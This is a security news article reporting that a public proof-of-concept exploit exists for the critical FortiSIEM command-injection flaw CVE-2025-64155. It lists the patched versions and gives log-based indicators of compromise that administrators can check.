FortiSIEM:Proof-of-Concept Exploit for Critical Vulnerability Publicly Available

During the night leading into Wednesday of this week, Fortinet released updates for a critical security vulnerability in FortiSIEM, among others. A proof-of-concept exploit is now publicly available. This makes it easier for malicious actors to exploit the security vulnerability. Attacks against it are therefore significantly more likely. Admins should apply the updates at the latest now.

The vulnerability in question is listed under the entry CVE-2025-64155 (CVSS 9.4, Risk “critical”). Through carefully crafted TCP requests, attackers from the network can inject malicious code that is then executed. The cause is insufficient filtering of elements used in operating system commands. The FortiSIEM versions 7.4.1, 7.3.5, 7.2.7, and 7.1.9 correct the errors; older versions must be migrated to these levels to patch the security hole.

The vulnerability was discovered by IT researchers from the company horizon3.ai. They also developed and publicly released a proof-of-concept exploit on GitHub. Their report explains the security vulnerability in detail. Additionally, the IT researchers have listed example indicators of compromise (IOCs).

Attack Indicators in Log File

According to the report, message contents from the vulnerable phMonitor service end up in log files in the directory “/opt/phoenix/log/phoenix.logs”. In these log files, administrators must look for entries with “PHL_ERROR”. There, they will find the URL from which malicious code was downloaded and information about which file on the system it was then written to.

The horizon3.ai researchers state that they discovered the now-closed security vulnerability during their analysis of the FortiSIEM security vulnerability CVE-2025-25256 from last August. Exploit code for that security flaw was also available at that time.

(dmk)